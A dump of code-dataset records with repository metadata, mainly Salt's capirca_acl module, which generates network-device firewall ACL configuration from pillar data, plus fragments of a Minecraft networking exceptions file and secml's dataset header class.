"""Raised by 'minecraft.networking.Connection' when a connection attempt
is terminated by the server sending a Disconnect packet, during login,
with an unknown message format.
"""
class InvalidState(ConnectionFailure):
"""Raised by 'minecraft.networking.Connection' when a connection attempt
fails due to to the internal state of the Connection being unsuitable,
for example if there is an existing ongoing connection.
"""
class IgnorePacket(Exception):
"""This exception may be raised from within a packet handler, such as
`PacketReactor.react' or a packet listener added with
`Connection.register_packet_listener', to stop any subsequent handlers
from being called on that particular packet.
""" | 36.886076 | 98 | 0.697666 |
4a25acb0af0153572842046fa2485721e959b2fc | 43,391 | py | Python | salt/modules/capirca_acl.py | major0/salt | 2019cc89602d296d060e24111df8f9702a8c6bc9 | [
"Apache-2.0"
] | null | null | null | salt/modules/capirca_acl.py | major0/salt | 2019cc89602d296d060e24111df8f9702a8c6bc9 | [
"Apache-2.0"
] | null | null | null | salt/modules/capirca_acl.py | major0/salt | 2019cc89602d296d060e24111df8f9702a8c6bc9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Capirca ACL
============
Generate ACL (firewall) configuration for network devices.
.. versionadded:: 2017.7.0
:codeauthor: Mircea Ulinic <[email protected]> & Robert Ankeny <[email protected]>
:maturity: new
:depends: capirca
:platform: unix
Dependencies
------------
The firewall configuration is generated by Capirca_.
.. _Capirca: https://github.com/google/capirca
Capirca is not yet available on PyPI, therefore it has to be installed
directly from Git: ``pip install -e git+ssh://[email protected]/google/capirca.git#egg=aclgen``.
'''
from __future__ import absolute_import, print_function, unicode_literals
import re
import inspect
import logging
import datetime
log = logging.getLogger(__file__)
# Import third party libs
from salt.ext import six
try:
import aclgen
HAS_CAPIRCA = True
except ImportError:
HAS_CAPIRCA = False
# Import Salt libs
import salt.utils.files
# ------------------------------------------------------------------------------
# module properties
# ------------------------------------------------------------------------------
__virtualname__ = 'capirca'
__proxyenabled__ = ['*']
# allow any proxy type
# ------------------------------------------------------------------------------
# property functions
# ------------------------------------------------------------------------------
def __virtual__():
'''
This module requires at least Capirca to work.
'''
if HAS_CAPIRCA:
return __virtualname__
else:
return (False, 'The capirca module (capirca_acl) cannot be loaded.')
# ------------------------------------------------------------------------------
# module globals
# ------------------------------------------------------------------------------
# define the default values for all possible term fields
# we could also extract them from the `policy` module, inspecting the `Policy`
# class, but that might be overkill & it would make the code less obvious.
# we can revisit this later if necessary.
_TERM_FIELDS = {
'action': [],
'address': [],
'address_exclude': [],
'comment': [],
'counter': None,
'expiration': None,
'destination_address': [],
'destination_address_exclude': [],
'destination_port': [],
'destination_prefix': [],
'forwarding_class': [],
'forwarding_class_except': [],
'logging': [],
'log_name': None,
'loss_priority': None,
'option': [],
'owner': None,
'policer': None,
'port': [],
'precedence': [],
'principals': [],
'protocol': [],
'protocol_except': [],
'qos': None,
'pan_application': [],
'routing_instance': None,
'source_address': [],
'source_address_exclude': [],
'source_port': [],
'source_prefix': [],
'verbatim': [],
'packet_length': None,
'fragment_offset': None,
'hop_limit': None,
'icmp_type': [],
'icmp_code': None,
'ether_type': [],
'traffic_class_count': None,
'traffic_type': [],
'translated': False,
'dscp_set': None,
'dscp_match': [],
'dscp_except': [],
'next_ip': None,
'flexible_match_range': [],
'source_prefix_except': [],
'destination_prefix_except': [],
'vpn': None,
'source_tag': [],
'destination_tag': [],
'source_interface': None,
'destination_interface': None,
'platform': [],
'platform_exclude': [],
'timeout': None,
'flattened': False,
'flattened_addr': None,
'flattened_saddr': None,
'flattened_daddr': None,
'priority': None,
'ttl': None
}
# IP-type fields
# Capirca does not ingest raw text for IP fields; addresses need to be
# converted to `nacaddr.IP` objects.
# This pre-processing is done in `_clean_term_opts`.
_IP_FIELDS = [
'source_address',
'source_address_exclude',
'destination_address',
'address',
'address_exclude',
'flattened_addr',
'flattened_saddr',
'flattened_daddr',
'next_ip'
]
_SERVICES = {}
# ------------------------------------------------------------------------------
# helper functions -- will not be exported
# ------------------------------------------------------------------------------
if HAS_CAPIRCA:
class _Policy(aclgen.policy.Policy):
'''
Extending the Capirca Policy class to allow inserting custom filters.
'''
def __init__(self):
self.filters = []
self.filename = ''
class _Term(aclgen.policy.Term):
'''
Extending the Capirca Term class to allow setting field valued on the fly.
'''
def __init__(self):
for field, default in six.iteritems(_TERM_FIELDS):
setattr(self, field, default)
def _import_platform_generator(platform):
'''
Given a specific platform (under the Capirca conventions),
return the generator class.
The generator class is identified looking under the <platform> module
for a class inheriting the `ACLGenerator` class.
'''
log.debug('Using platform: {plat}'.format(plat=platform))
for mod_name, mod_obj in inspect.getmembers(aclgen):
if mod_name == platform and inspect.ismodule(mod_obj):
for plat_obj_name, plat_obj in inspect.getmembers(mod_obj): # pylint: disable=unused-variable
if inspect.isclass(plat_obj) and issubclass(plat_obj, aclgen.aclgenerator.ACLGenerator):
log.debug('Identified Capirca class {cls} for {plat}'.format(
cls=plat_obj,
plat=platform))
return plat_obj
    log.error('Unable to identify any Capirca platform class for {plat}'.format(plat=platform))
def _get_services_mapping():
'''
Build a map of services based on the IANA assignment list:
http://www.iana.org/assignments/port-numbers
It will load the /etc/services file and will build the mapping on the fly,
    similar to Capirca's SERVICES file:
https://github.com/google/capirca/blob/master/def/SERVICES.svc
    As this module is available on Unix systems only,
we'll read the services from /etc/services.
In the worst case, the user will not be able to specify the
services shortcut and they will need to specify the protocol / port combination
using the source_port / destination_port & protocol fields.
'''
if _SERVICES:
return _SERVICES
services_txt = ''
try:
with salt.utils.files.fopen('/etc/services', 'r') as srv_f:
services_txt = salt.utils.stringutils.to_unicode(srv_f.read())
except IOError as ioe:
log.error('Unable to read from /etc/services:')
log.error(ioe)
        return _SERVICES  # no mapping possible; will return the default (empty) mapping
service_rgx = re.compile(r'^([a-zA-Z0-9-]+)\s+(\d+)\/(tcp|udp)(.*)$')
for line in services_txt.splitlines():
service_rgx_s = service_rgx.search(line)
if service_rgx_s and len(service_rgx_s.groups()) == 4:
srv_name, port, protocol, _ = service_rgx_s.groups()
if srv_name not in _SERVICES:
_SERVICES[srv_name] = {
'port': [],
'protocol': []
}
try:
_SERVICES[srv_name]['port'].append(int(port))
except ValueError as verr:
log.error(verr)
log.error('Did not read that properly:')
log.error(line)
                log.error('Please report the above error: {port} does not seem to be a valid port value!'.format(port=port))
_SERVICES[srv_name]['protocol'].append(protocol)
return _SERVICES
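# Illustrative shape of the mapping built above (values depend on the local
# /etc/services; note that ports are appended once per matching line, so a
# service listed for both tcp and udp appears twice):
#   {'ntp': {'port': [123, 123], 'protocol': ['tcp', 'udp']}, ...}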
def _translate_port(port):
'''
Look into services and return the port value using the
service name as lookup value.
'''
services = _get_services_mapping()
if port in services and services[port]['port']:
return services[port]['port'][0]
return port
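# e.g. _translate_port('ntp') -> 123 on a standard /etc/services, while a
# name missing from the mapping is returned unchanged:
# _translate_port('nope') -> 'nope'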
def _make_it_list(dict_, field_name, value):
'''
Return the object list.
'''
prev_value = []
    # first we'll collect the previous value
if field_name in dict_:
prev_value = dict_[field_name]
if value is None:
return prev_value
elif isinstance(value, (tuple, list)):
        # other types of iterables
if field_name in ('source_port', 'destination_port'):
# port fields are more special
            # they can be either a list of integers or a list of tuples
# list of integers = a list of ports
# list of tuples = a list of ranges,
# e.g.: [(1000, 2000), (3000, 4000)] means the 1000-2000 and 3000-4000 ranges
portval = []
for port in value:
if not isinstance(port, (tuple, list)):
                    # to make sure everything is consistent,
                    # we'll transform individual ports into tuples;
                    # an individual port, e.g. 1000, will be transformed into
                    # the equivalent port range 1000-1000, which assures
                    # consistency for the Capirca parser
portval.append((port, port))
else:
portval.append(port)
translated_portval = []
            # and the ports sent as strings, e.g. ntp instead of 123,
            # need to be translated as well, using the same /etc/services
for port_start, port_end in portval:
if not isinstance(port_start, int):
port_start = _translate_port(port_start)
if not isinstance(port_end, int):
port_end = _translate_port(port_end)
translated_portval.append(
(port_start, port_end)
)
return list(set(prev_value + translated_portval))
return list(set(prev_value + list(value)))
if field_name in ('source_port', 'destination_port'):
if not isinstance(value, int):
value = _translate_port(value)
return list(set(prev_value + [(value, value)])) # a list of tuples
# anything else will be enclosed in a list-type
return list(set(prev_value + [value]))
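# Illustrative behaviour for the port fields (ordering may vary, as the
# result goes through a set):
#   _make_it_list({}, 'source_port', [1000, (2000, 2100)])
#   -> [(1000, 1000), (2000, 2100)]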
def _clean_term_opts(term_opts):
'''
    Clean up the term opts:
    - strip null and empty values, defaulting them to their base definition from _TERM_FIELDS
    - convert the fields listed in _IP_FIELDS to `nacaddr.IP` objects
    - create lists for those fields requiring it
'''
clean_opts = {}
_services = _get_services_mapping()
for field, value in six.iteritems(term_opts):
        # firstly we'll process special fields like source_service or destination_service,
        # which inject values directly into the source or destination port and protocol fields
if field == 'source_service' and value:
if isinstance(value, six.string_types):
value = _make_it_list(clean_opts, field, value)
log.debug('Processing special source services:')
log.debug(value)
for service in value:
if service and service in _services:
# if valid source_service
# take the port and protocol values from the global and inject in the term config
clean_opts['source_port'] = _make_it_list(clean_opts,
'source_port',
_services[service]['port'])
clean_opts['protocol'] = _make_it_list(clean_opts,
'protocol',
_services[service]['protocol'])
log.debug('Built source_port field, after processing special source services:')
log.debug(clean_opts.get('source_port'))
log.debug('Built protocol field, after processing special source services:')
log.debug(clean_opts.get('protocol'))
elif field == 'destination_service' and value:
if isinstance(value, six.string_types):
value = _make_it_list(clean_opts, field, value)
log.debug('Processing special destination services:')
log.debug(value)
for service in value:
if service and service in _services:
# if valid destination_service
# take the port and protocol values from the global and inject in the term config
clean_opts['destination_port'] = _make_it_list(clean_opts,
'destination_port',
_services[service]['port'])
clean_opts['protocol'] = _make_it_list(clean_opts,
'protocol',
_services[service]['protocol'])
log.debug('Built source_port field, after processing special destination services:')
log.debug(clean_opts.get('destination_service'))
log.debug('Built protocol field, after processing special destination services:')
log.debug(clean_opts.get('protocol'))
# not a special field, but it has to be a valid one
elif field in _TERM_FIELDS and value and value != _TERM_FIELDS[field]:
# if not a special field type
if isinstance(_TERM_FIELDS[field], list):
value = _make_it_list(clean_opts, field, value)
            if field in _IP_FIELDS:
# IP-type fields need to be transformed
ip_values = []
for addr in value:
ip_values.append(aclgen.policy.nacaddr.IP(addr))
value = ip_values[:]
clean_opts[field] = value
return clean_opts
def _lookup_element(lst, key):
'''
Find an dictionary in a list of dictionaries, given its main key.
'''
if not lst:
return {}
for ele in lst:
if not ele or not isinstance(ele, dict):
continue
        if next(iter(ele)) == key:  # dict views are not indexable on Python 3
            return next(iter(ele.values()))
return {}
def _get_pillar_cfg(pillar_key,
pillarenv=None,
saltenv=None):
'''
Retrieve the pillar data from the right environment.
'''
pillar_cfg = __salt__['pillar.get'](pillar_key,
pillarenv=pillarenv,
saltenv=saltenv)
return pillar_cfg
def _cleanup(lst):
'''
Return a list of non-empty dictionaries.
'''
clean = []
for ele in lst:
if ele and isinstance(ele, dict):
clean.append(ele)
return clean
def _merge_list_of_dict(first, second, prepend=True):
'''
Merge lists of dictionaries.
Each element of the list is a dictionary having one single key.
That key is then used as unique lookup.
The first element list has higher priority than the second.
When there's an overlap between the two lists,
it won't change the position, but the content.
'''
first = _cleanup(first)
second = _cleanup(second)
if not first and not second:
return []
if not first and second:
return second
if first and not second:
return first
# Determine overlaps
# So we don't change the position of the existing terms/filters
overlaps = []
merged = []
appended = []
for ele in first:
        if _lookup_element(second, next(iter(ele))):
overlaps.append(ele)
elif prepend:
merged.append(ele)
elif not prepend:
appended.append(ele)
for ele in second:
        ele_key = next(iter(ele))
        if _lookup_element(overlaps, ele_key):
            # if there's an overlap, get the value from the first list,
            # but insert it into the right position
ele_val_first = _lookup_element(first, ele_key)
merged.append({ele_key: ele_val_first})
else:
merged.append(ele)
if not prepend:
merged.extend(appended)
return merged
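# Illustrative behaviour (each element's single key is the unique lookup;
# the overlapping key 'b' keeps the value from the first list):
#   _merge_list_of_dict([{'a': 1}, {'b': 2}], [{'b': 20}, {'c': 3}])
#   -> [{'a': 1}, {'b': 2}, {'c': 3}]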
def _get_term_object(filter_name,
term_name,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
**term_fields):
'''
Return an instance of the ``_Term`` class given the term options.
'''
log.debug('Generating config for term {tname} under filter {fname}'.format(
tname=term_name,
fname=filter_name
))
term = _Term()
term.name = term_name
term_opts = {}
if merge_pillar:
term_opts = get_term_pillar(filter_name,
term_name,
pillar_key=pillar_key,
saltenv=saltenv,
pillarenv=pillarenv)
log.debug('Merging with pillar data:')
log.debug(term_opts)
term_opts = _clean_term_opts(term_opts)
log.debug('Cleaning up pillar data:')
log.debug(term_opts)
log.debug('Received processing opts:')
log.debug(term_fields)
log.debug('Cleaning up processing opts:')
term_fields = _clean_term_opts(term_fields)
log.debug(term_fields)
log.debug('Final term opts:')
term_opts.update(term_fields)
    log.debug(term_opts)
for field, value in six.iteritems(term_opts):
# setting the field attributes to the term instance of _Term
setattr(term, field, value)
log.debug('Term config:')
log.debug(six.text_type(term))
return term
def _get_policy_object(platform,
filters=None,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True):
'''
Return an instance of the ``_Policy`` class given the filters config.
'''
policy = _Policy()
policy_filters = []
if not filters:
filters = []
for filter_ in filters:
if not filter_ or not isinstance(filter_, dict):
continue # go to the next filter
        filter_name = next(iter(filter_))
        filter_config = next(iter(filter_.values()))
header = aclgen.policy.Header() # same header everywhere
target_opts = [
platform,
filter_name
]
filter_options = filter_config.pop('options', None)
if filter_options:
filter_options = _make_it_list({}, filter_name, filter_options)
# make sure the filter options are sent as list
target_opts.extend(filter_options)
target = aclgen.policy.Target(target_opts)
header.AddObject(target)
filter_terms = []
for term_ in filter_config.get('terms', []):
if term_ and isinstance(term_, dict):
                term_name = next(iter(term_))
                term_fields = next(iter(term_.values()))
term = _get_term_object(filter_name,
term_name,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar,
**term_fields)
filter_terms.append(term)
policy_filters.append(
(header, filter_terms)
)
policy.filters = policy_filters
log.debug('Policy config:')
log.debug(six.text_type(policy))
platform_generator = _import_platform_generator(platform)
policy_config = platform_generator(policy, 2)
log.debug('Generating policy config for {platform}:'.format(
platform=platform))
log.debug(six.text_type(policy_config))
return policy_config
def _revision_tag(text,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d'):
'''
Refactor revision tag comments.
Capirca generates the filter text having the following tag keys:
- $Id:$
- $Revision:$
- $Date:$
This function goes through all the config lines and replaces
those tags with the content requested by the user.
If a certain value is not provided, the corresponding tag will be stripped.
'''
timestamp = datetime.datetime.now().strftime(revision_date_format)
new_text = []
for line in text.splitlines():
if '$Id:$' in line:
if not revision_id: # if no explicit revision ID required
continue # jump to next line, ignore this one
line = line.replace('$Id:$', '$Id: {rev_id} $'.format(rev_id=revision_id))
if '$Revision:$' in line:
if not revision_no: # if no explicit revision number required
continue # jump to next line, ignore this one
line = line.replace('$Revision:$', '$Revision: {rev_no} $'.format(rev_no=revision_no))
if '$Date:$' in line:
if not revision_date:
continue # jump
line = line.replace('$Date:$', '$Date: {ts} $'.format(ts=timestamp))
new_text.append(line)
return '\n'.join(new_text)
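# e.g. with revision_date=True and no revision_id/revision_no, a line
# "! $Date:$" becomes "! $Date: 2017/03/22 $" (using the current date),
# while "! $Id:$" and "! $Revision:$" lines are dropped entirely.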
# ------------------------------------------------------------------------------
# callable functions
# ------------------------------------------------------------------------------
def get_term_config(platform,
filter_name,
term_name,
filter_options=None,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d',
source_service=None,
destination_service=None,
**term_fields):
'''
Return the configuration of a single policy term.
platform
The name of the Capirca platform.
filter_name
The name of the policy filter.
term_name
The name of the term.
filter_options
Additional filter options. These options are platform-specific.
E.g.: ``inet6``, ``bridge``, ``object-group``,
See the complete list of options_.
.. _options: https://github.com/google/capirca/wiki/Policy-format#header-section
pillar_key: ``acl``
        The key in the pillar containing the default attribute values. Default: ``acl``.
If the pillar contains the following structure:
.. code-block:: yaml
firewall:
- my-filter:
terms:
- my-term:
source_port: 1234
source_address:
- 1.2.3.4/32
- 5.6.7.8/32
The ``pillar_key`` field would be specified as ``firewall``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
merge_pillar: ``True``
Merge the CLI variables with the pillar. Default: ``True``.
revision_id
Add a comment in the term config having the description for the changes applied.
revision_no
The revision count.
revision_date: ``True``
Boolean flag: display the date when the term configuration was generated. Default: ``True``.
revision_date_format: ``%Y/%m/%d``
        The date format to be used when generating the revision date. Default: ``%Y/%m/%d`` (<year>/<month>/<day>).
source_service
A special service to choose from. This is a helper so the user is able to
select a source just using the name, instead of specifying a source_port and protocol.
As this module is available on Unix platforms only,
it reads the IANA_ port assignment from ``/etc/services``.
If the user requires additional shortcuts to be referenced, they can add entries under ``/etc/services``,
which can be managed using the :mod:`file state <salt.states.file>`.
.. _IANA: http://www.iana.org/assignments/port-numbers
destination_service
A special service to choose from. This is a helper so the user is able to
        select a destination just using the name, instead of specifying a destination_port and protocol.
Allows the same options as ``source_service``.
**term_fields
Term attributes.
To see what fields are supported, please consult the list of supported keywords_.
Some platforms have few other optional_ keywords.
.. _keywords: https://github.com/google/capirca/wiki/Policy-format#keywords
.. _optional: https://github.com/google/capirca/wiki/Policy-format#optionally-supported-keywords
.. note::
The following fields are accepted:
- action
- address
- address_exclude
- comment
- counter
- expiration
- destination_address
- destination_address_exclude
- destination_port
- destination_prefix
- forwarding_class
- forwarding_class_except
- logging
- log_name
- loss_priority
- option
- policer
- port
- precedence
- principals
- protocol
- protocol_except
- qos
- pan_application
- routing_instance
- source_address
- source_address_exclude
- source_port
- source_prefix
- verbatim
- packet_length
- fragment_offset
- hop_limit
- icmp_type
- ether_type
- traffic_class_count
- traffic_type
- translated
- dscp_set
- dscp_match
- dscp_except
- next_ip
- flexible_match_range
- source_prefix_except
- destination_prefix_except
- vpn
- source_tag
- destination_tag
- source_interface
- destination_interface
- flattened
- flattened_addr
- flattened_saddr
- flattened_daddr
- priority
.. note::
The following fields can be also a single value and a list of values:
- action
- address
- address_exclude
- comment
- destination_address
- destination_address_exclude
- destination_port
- destination_prefix
- forwarding_class
- forwarding_class_except
- logging
- option
- port
- precedence
- principals
- protocol
- protocol_except
- pan_application
- source_address
- source_address_exclude
- source_port
- source_prefix
- verbatim
- icmp_type
- ether_type
- traffic_type
- dscp_match
- dscp_except
- flexible_match_range
- source_prefix_except
- destination_prefix_except
- source_tag
- destination_tag
- source_service
- destination_service
Example: ``destination_address`` can be either defined as:
.. code-block:: yaml
destination_address: 172.17.17.1/24
or as a list of destination IP addresses:
.. code-block:: yaml
destination_address:
- 172.17.17.1/24
- 172.17.19.1/24
or a list of services to be matched:
.. code-block:: yaml
source_service:
- ntp
- snmp
- ldap
- bgpd
.. note::
The port fields ``source_port`` and ``destination_port`` can be used as above to select either
a single value, either a list of values, but also they can select port ranges. Example:
.. code-block:: yaml
source_port:
- [1000, 2000]
- [3000, 4000]
With the configuration above, the user is able to select the 1000-2000 and 3000-4000 source port ranges.
CLI Example:
.. code-block:: bash
salt '*' capirca.get_term_config arista filter-name term-name source_address=1.2.3.4 destination_address=5.6.7.8 action=accept
Output Example:
.. code-block:: text
! $Date: 2017/03/22 $
no ip access-list filter-name
ip access-list filter-name
remark term-name
permit ip host 1.2.3.4 host 5.6.7.8
exit
'''
terms = []
term = {
term_name: {
}
}
term[term_name].update(term_fields)
term[term_name].update({
'source_service': _make_it_list({}, 'source_service', source_service),
'destination_service': _make_it_list({}, 'destination_service', destination_service),
})
terms.append(term)
if not filter_options:
filter_options = []
return get_filter_config(platform,
filter_name,
filter_options=filter_options,
terms=terms,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar,
only_lower_merge=True,
revision_id=revision_id,
revision_no=revision_no,
revision_date=revision_date,
revision_date_format=revision_date_format)
def get_filter_config(platform,
filter_name,
filter_options=None,
terms=None,
prepend=True,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
only_lower_merge=False,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d'):
'''
Return the configuration of a policy filter.
platform
The name of the Capirca platform.
filter_name
The name of the policy filter.
filter_options
Additional filter options. These options are platform-specific.
See the complete list of options_.
.. _options: https://github.com/google/capirca/wiki/Policy-format#header-section
terms
List of terms for this policy filter.
If not specified or empty, will try to load the configuration from the pillar,
unless ``merge_pillar`` is set as ``False``.
prepend: ``True``
When ``merge_pillar`` is set as ``True``, the final list of terms generated by merging
the terms from ``terms`` with those defined in the pillar (if any): new terms are prepended
at the beginning, while existing ones will preserve the position. To add the new terms
at the end of the list, set this argument to ``False``.
pillar_key: ``acl``
        The key in the pillar containing the default attribute values. Default: ``acl``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
merge_pillar: ``True``
Merge the CLI variables with the pillar. Default: ``True``.
only_lower_merge: ``False``
Specify if it should merge only the terms fields. Otherwise it will try
to merge also filters fields. Default: ``False``.
revision_id
Add a comment in the filter config having the description for the changes applied.
revision_no
The revision count.
revision_date: ``True``
Boolean flag: display the date when the filter configuration was generated. Default: ``True``.
revision_date_format: ``%Y/%m/%d``
        The date format to be used when generating the revision date. Default: ``%Y/%m/%d`` (<year>/<month>/<day>).
CLI Example:
.. code-block:: bash
salt '*' capirca.get_filter_config ciscoxr my-filter pillar_key=netacl
Output Example:
.. code-block:: text
! $Id:$
! $Date:$
! $Revision:$
no ipv4 access-list my-filter
ipv4 access-list my-filter
remark $Id:$
remark my-term
deny ipv4 any eq 1234 any
deny ipv4 any eq 1235 any
remark my-other-term
permit tcp any range 5678 5680 any
exit
The filter configuration has been loaded from the pillar, having the following structure:
.. code-block:: yaml
netacl:
- my-filter:
terms:
- my-term:
source_port: [1234, 1235]
action: reject
- my-other-term:
source_port:
- [5678, 5680]
protocol: tcp
action: accept
'''
if not filter_options:
filter_options = []
if not terms:
terms = []
if merge_pillar and not only_lower_merge:
acl_pillar_cfg = _get_pillar_cfg(pillar_key,
saltenv=saltenv,
pillarenv=pillarenv)
filter_pillar_cfg = _lookup_element(acl_pillar_cfg, filter_name)
filter_options = filter_options or filter_pillar_cfg.pop('options', None)
if filter_pillar_cfg:
# Only when it was able to find the filter in the ACL config
pillar_terms = filter_pillar_cfg.get('terms', []) # No problem if empty in the pillar
terms = _merge_list_of_dict(terms, pillar_terms, prepend=prepend)
# merge the passed variable with the pillar data
    # any filter term not defined here will be appended from the pillar
# new terms won't be removed
filters = []
filters.append({
filter_name: {
'options': _make_it_list({}, filter_name, filter_options),
'terms': terms
}
})
return get_policy_config(platform,
filters=filters,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar,
only_lower_merge=True,
revision_id=revision_id,
revision_no=revision_no,
revision_date=revision_date,
revision_date_format=revision_date_format)
def get_policy_config(platform,
filters=None,
prepend=True,
pillar_key='acl',
pillarenv=None,
saltenv=None,
merge_pillar=True,
only_lower_merge=False,
revision_id=None,
revision_no=None,
revision_date=True,
revision_date_format='%Y/%m/%d'):
'''
Return the configuration of the whole policy.
platform
The name of the Capirca platform.
filters
List of filters for this policy.
If not specified or empty, will try to load the configuration from the pillar,
unless ``merge_pillar`` is set as ``False``.
prepend: ``True``
When ``merge_pillar`` is set as ``True``, the final list of filters generated by merging
the filters from ``filters`` with those defined in the pillar (if any): new filters are prepended
at the beginning, while existing ones will preserve the position. To add the new filters
at the end of the list, set this argument to ``False``.
pillar_key: ``acl``
        The key in the pillar containing the default attribute values. Default: ``acl``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
merge_pillar: ``True``
Merge the CLI variables with the pillar. Default: ``True``.
only_lower_merge: ``False``
Specify if it should merge only the filters and terms fields. Otherwise it will try
to merge everything at the policy level. Default: ``False``.
revision_id
Add a comment in the policy config having the description for the changes applied.
revision_no
The revision count.
revision_date: ``True``
Boolean flag: display the date when the policy configuration was generated. Default: ``True``.
revision_date_format: ``%Y/%m/%d``
        The date format to be used when generating the revision date. Default: ``%Y/%m/%d`` (<year>/<month>/<day>).
CLI Example:
.. code-block:: bash
salt '*' capirca.get_policy_config juniper pillar_key=netacl
Output Example:
.. code-block:: text
firewall {
family inet {
replace:
/*
** $Id:$
** $Date:$
** $Revision:$
**
*/
filter my-filter {
term my-term {
from {
source-port [ 1234 1235 ];
}
then {
reject;
}
}
term my-other-term {
from {
protocol tcp;
source-port 5678-5680;
}
then accept;
}
}
}
}
firewall {
family inet {
replace:
/*
** $Id:$
** $Date:$
** $Revision:$
**
*/
filter my-other-filter {
interface-specific;
term dummy-term {
from {
protocol [ tcp udp ];
}
then {
reject;
}
}
}
}
}
The policy configuration has been loaded from the pillar, having the following structure:
.. code-block:: yaml
netacl:
- my-filter:
options:
- not-interface-specific
terms:
- my-term:
source_port: [1234, 1235]
action: reject
- my-other-term:
source_port:
- [5678, 5680]
protocol: tcp
action: accept
- my-other-filter:
terms:
- dummy-term:
protocol:
- tcp
- udp
action: reject
'''
if not filters:
filters = []
if merge_pillar and not only_lower_merge:
# the pillar key for the policy config is the `pillar_key` itself
policy_pillar_cfg = _get_pillar_cfg(pillar_key,
saltenv=saltenv,
pillarenv=pillarenv)
        # now, let's merge everything with the pillar data
# again, this will not remove any extra filters/terms
# but it will merge with the pillar data
# if this behaviour is not wanted, the user can set `merge_pillar` as `False`
filters = _merge_list_of_dict(filters, policy_pillar_cfg, prepend=prepend)
policy_object = _get_policy_object(platform,
filters=filters,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv,
merge_pillar=merge_pillar)
policy_text = six.text_type(policy_object)
return _revision_tag(policy_text,
revision_id=revision_id,
revision_no=revision_no,
revision_date=revision_date,
revision_date_format=revision_date_format)
def get_filter_pillar(filter_name,
pillar_key='acl',
pillarenv=None,
saltenv=None):
'''
Helper that can be used inside a state SLS,
in order to get the filter configuration given its name.
filter_name
The name of the filter.
pillar_key
The root key of the whole policy config.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
'''
pillar_cfg = _get_pillar_cfg(pillar_key,
pillarenv=pillarenv,
saltenv=saltenv)
return _lookup_element(pillar_cfg, filter_name)
def get_term_pillar(filter_name,
term_name,
pillar_key='acl',
pillarenv=None,
saltenv=None):
'''
Helper that can be used inside a state SLS,
in order to get the term configuration given its name,
under a certain filter uniquely identified by its name.
filter_name
The name of the filter.
term_name
The name of the term.
pillar_key: ``acl``
The root key of the whole policy config. Default: ``acl``.
pillarenv
Query the master to generate fresh pillar data on the fly,
specifically from the requested pillar environment.
saltenv
Included only for compatibility with
:conf_minion:`pillarenv_from_saltenv`, and is otherwise ignored.
'''
filter_pillar_cfg = get_filter_pillar(filter_name,
pillar_key=pillar_key,
pillarenv=pillarenv,
saltenv=saltenv)
term_pillar_cfg = filter_pillar_cfg.get('terms', [])
term_opts = _lookup_element(term_pillar_cfg, term_name)
return term_opts
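# e.g. get_term_pillar('my-filter', 'my-term', pillar_key='firewall')
# returns the dict found under firewall -> my-filter -> terms -> my-term,
# or {} when the filter or term is not defined in the pillar.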
| 34.657348 | 134 | 0.553341 |
4a25ad2ca1c0ee97af698594ab0aa80ce1cf71f0 | 7,000 | py | Python | src/secml/data/c_dataset_header.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | [
"Apache-2.0"
] | 63 | 2020-04-20T16:31:16.000Z | 2022-03-29T01:05:35.000Z | src/secml/data/c_dataset_header.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | [
"Apache-2.0"
] | 5 | 2020-04-21T11:31:39.000Z | 2022-03-24T13:42:56.000Z | src/secml/data/c_dataset_header.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | [
"Apache-2.0"
] | 8 | 2020-04-21T09:16:42.000Z | 2022-02-23T16:28:43.000Z | """
.. module:: CDatasetHeader
:synopsis: Header with extra dataset attributes.
.. moduleauthor:: Marco Melis <[email protected]>
"""
from secml.core import CCreator
from secml.core.attr_utils import is_writable
from secml.core.type_utils import is_list
from secml.array import CArray
class CDatasetHeader(CCreator):
"""Creates a new dataset header.
Parameters to be included into the header could be defined as keyword
init arguments or by setting them as new public header attributes.
Immutable objects (scalar, string, tuple, dictionary) will be passed
as they are while indexing the header. Arrays will be indexed and the
result of indexing will be returned.
To extract a dictionary with the entire set of attributes,
use `.get_params()`.
Parameters
----------
kwargs : any, optional
Any extra attribute of the dataset.
Could be an immutable object (scalar, tuple, dict, str),
or a vector-like CArray. Lists are automatically converted
to vector-like CArrays.
Examples
--------
>>> from secml.data import CDatasetHeader
>>> from secml.array import CArray
>>> ds_header = CDatasetHeader(id='mydataset', colors=CArray([1,2,3]))
>>> print(ds_header.id)
mydataset
>>> print(ds_header.colors)
CArray([1 2 3])
>>> ds_header.age = 32
>>> print(ds_header.age)
32
"""
__super__ = 'CDatasetHeader'
__class_type = 'standard'
def __init__(self, **kwargs):
self._num_samples = None # Will be populated by `._validate_params()`
# Set each optional arg
for key, value in kwargs.items():
setattr(self, key, value)
@property
def num_samples(self):
"""The number of samples for which the header defines extra params."""
return self._num_samples
def __setattr__(self, key, value):
"""Add a new attribute to the header.
Parameters
----------
key : str
Attribute to set.
